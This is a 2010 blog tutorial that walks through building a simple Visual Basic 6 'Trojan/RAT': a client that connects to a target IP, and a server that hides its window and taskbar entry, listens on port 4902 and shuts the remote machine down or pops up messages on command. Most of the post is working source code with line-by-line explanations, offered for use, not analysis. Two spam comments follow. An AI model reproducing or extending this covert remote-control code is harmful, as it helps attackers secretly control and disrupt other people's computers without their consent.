We Recommend

Click here to Vote!

Saturday, July 3, 2010

How to make a simple VB6 Trojan/RAT by M4x1m aka ViRuzz

Welcome to my tutorial on how to code a simple VB6 Trojan. We will use the Direct Connection, where you have to enter the IP of the Remote Computer, where the Server is Running. Trojans are also known as "RATs" (Remote Administration Tools or Remote Access Trojan).

How they work:
You start your program called "server" on a Computer, go back to your computer, enter the IP of the other Computer and hit connect. If the Firewall or Antivirus doesn't lock the connection, you have successfully established the Connection between the Computers using Winsock Controls. There are two types of RATs. Direct Connection(we will use this) and Reverse Connection.

So let's begin with the Tutorial. First we will code the "Client". In the Client you enter the IP and click connect:

[font size=+1]The Client[/size]

Open up VB6, and create a "New Project". Name it whatever you want, I suggest you "RAT Client".

Paste from the ToolBox these Controls:

* three TextBoxes (NAMES: 1 Textbox: Text1, 2 TextBox: Text2, 3 TextBox: Text3)
* 4 Buttons (Names: 1 Button: Command1, 2 Button: Command2, 3 Button: Command3, 4 Button: Command4)
* Winsock (Find it under Components)(NAME: Winsock1)
* 3 Labels (Names: 1 Label: Label1, 2 Label: Label2, 3 Label: Label3)


Ok now, design the GUI. It should look like this:


- Command1 is Used to Connect to the Server
- Command2 is Used to shutdown the Remote PC
- Command3 is used to send a Message
- Command4 is used to Disconnect from the Server
- Text1 is used to enter the IP you want to connect
- Text2 is used to enter the Port on which you want to connect
- Text3 is used to send a message to the Server
- Winsock1 is used to send Data/Requests to the Server

Ok, lets start with the Code.

After you added all the Buttons etc. double click on your Form, and paste this code at the top of all other code:
-
Private Const SPLITTER As String = "{Ex}"
-

Explanation: This is the string you will use to split your data.

Double Click Command1 (Used to Connect to the Server) and paste this code:
-
Command1.Enabled = False
Winsock1.Close
Winsock1.RemoteHost = Text1.Text
Winsock1.RemotePort = Text2.Text
Winsock1.Connect
-

Explanation:

1 Line: Disables the connect button.
2 Line: Closes all other connections.
3 Line: The remote host is the IP or Computername of the target computer.
4 Line: The Port on that the Client should connect to the Server.

Double Click the "Disconnect Button" (Command2) and write this code:
-
If Winsock1.State = 7 Then
Winsock1.SendData "Shutdown"
Else
Label3.Caption = "Error you need to connect first."
End If
-

Explanation:

1. Line: Checks if winsock is connected. 7 = connected.
2. Line: Sends the string "Shutdown" to the server.
3. Line: if its not connected.
4. Line: Tells the user to connect first.

After that Double Click Command3 (Send Message) and write this code:
-
If Winsock1.State = 7 Then 'Checks if winsock is connected. 7 = connected
Winsock1.SendData "Message" & SPLITTER & Text3.Text
Else
Label3.Caption = "Error you need to connect first."
End If
-

Explanation

1. Line: Checks if winsock is connected. 7 = connected.
2. Line: Sends a string that can be separated into two sections to the server. Section (0) will contain the command "Message" and section (1) will contain the message.
3. Line: if not connected.
4. Line: Tells the user to connect first.

Now double Click the last Button called Command4. It is used to Disconnect from the Server.
-
Winsock1.Close
Label3.Caption = "Disconnected"
Command1.Enabled = True
-

Explanation:

1. Line: Closes the Socket.
2. Line: Shows that we successfully disconnected.
3. Line: Re-enables the "Connect" Button (Command1).

After that, go to your Winsock and select Winsock1_Close. Paste there the same code from the last step.

The Last Step on the Client. Select Winsock1_Connect. Paste there this code:
-
Label3.Caption = "Connected to " & Winsock1.RemoteHostIP
-

Explanation:

1. Line: Refreshes the Label3 and shows that we are successfully connected.

Done! You are done with your Client! Save the Project, and build it. Name it "Client.exe".


[text color=blue]The Server[/color]


Make a new Project in VB6, and name it "Server". Again add from the components Winsock (Winsock1)

Afther that double click your Form1. Enter this code at the top of all other code:
-
Private Const SPLITTER As String = "{Ex}"
-

Explanation:

1. Line: As in the Client said, it is used to Split your data.

Ok, go back to your Form1, and double click it again. Paste this code at Form1_Load:
-
Me.Visible = False
App.TaskVisible = False
Winsock1.LocalPort = "4902"
Winsock1.Listen
-

Explanation:

1. Line: Hides the Form1. Makes it Invisible.
2. Line: Disables "ShowInTaskbar". Invisible in the Task Bar.
3. Line: Sets the Port the Server has to listen on.
4. Line: Let's the Server listen on the specified Port.

Ok, now select Winsock1_Close. The Command what the server has to do, if the Client Disconnects. Paste this code:
-
Winsock1.Close
Winsock1.LocalPort = "4902"
Winsock1.Listen
-

Explanation:

1. Line: Closes the Winsock.
2. Line: Re-opens the Port.
3. Line: Listens on the specified port.

Ok now select Winsock1_ConnectionRequest. Paste this code:
-
Winsock1.Close
Winsock1.Accept requestID
-

Explanation:

1. Line: Closes the Winsock.
2. Line: Accepts any Incoming Connection from any Client.

Now, the last Step, but the most Important to get all the Functions work. Select Winsock1_DataArrival. Paste this code there:
-
Dim Temp As String
Dim Temp2() As String
Winsock1.GetData Temp

Temp2 = Split(Temp, SPLITTER)
Select Case Temp2(0)
Case "Shutdown"
Shell "shutdown -s -t 00"
Case "Message"
MsgBox Temp2(1)
End Select
-

Explanation:

1. Line: Makes the string that will hold the data being transfered.
2. Line: Makes a string that will split it into sections.
3. Line: Gets the sent data and dump it into the Temp variable.
4. Line: Splits the Temp variable into sections using the dilemiter
SPLITTER which is = "{Ex}".
5. Line: Checks the value of the first part of our string.
6. Line: If the first part of the string is "Shutdown"...
7. Line: ...then it runs a shutdown script.
8. Line: If the first part of the string is "Message" then...
9. Line: displays a message box with the section of the string in the body text.

Finally you have done your server! Now save the Project and Build it. Save it as "Server".

Enjoy, you just made your RAT!

This tutorial was written by M4x1m aka. ViRuzz (me). Enjoy it!

2 comments:

  1. Best Software Downloads and Reviews. the most comprehensive source for free-to-
    trysoftware downloads on the WebBEST 4
    DOWNLOADS

    ReplyDelete
  2. yes i like above all the prograams and it's really wonderful ,,,,

    ReplyDelete